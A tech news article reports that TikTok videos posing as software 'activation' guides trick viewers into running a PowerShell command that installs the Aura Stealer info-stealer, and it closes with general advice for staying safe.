- TikTok videos trick users into executing malicious commands disguised as software activators
- Aura Stealer malware steals passwords, cookies and crypto wallet data from infected systems
- Avoid suspicious links, use official software and keep security tools fully up to date
The dreaded ClickFix malware attacks are now targeting TikTok users, tricking them into installing info-stealers and losing sensitive files, access to accounts and possibly even money.
Security researchers including Trend Micro, Xavier Mertens and others have all reported seeing several TikTok videos offering instructions on how to “activate” popular software such as Windows, Microsoft 365, Adobe Premiere and others. In some cases, the videos show viewers how to activate product bundles that don’t even exist, like on Netflix or Spotify.
“Activation” is the usual ClickFix trick: users are prompted to copy and paste a command into Windows Run that, in reality, is a malicious PowerShell command that deploys and runs Aura Stealer.
How to stay safe
Aura Stealer is an information-stealing malware that scrapes passwords stored in browsers, authentication cookies, cryptocurrency wallet data, and credentials from other applications. Xavier Mertens also added that the ClickFix code also downloads additional malware, the purpose of which is unclear at the moment.
As a scam technique, ClickFix has been around for decades. It works by tricking people into thinking they have a problem with their computer, then offering a quick and easy solution.
It all started with browser pop-ups in the early 2000s, when the scam revolved around fake virus notifications. More recently, ClickFix has evolved and now deceives people with fake “locked” documents, exclusive offers, software activators, etc.
To stay safe, be skeptical of random links or buttons in emails or websites, especially those that ask you for urgent fixes or updates. Always visit official websites and use legitimate software. Additionally, make sure your browser, operating system, and security software are up to date and use a reliable ad blocker (if possible).
Finally, be careful when granting permissions to websites or apps. If something seems suspicious or too convenient, close the page and check it first.
Via BeepComputer
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
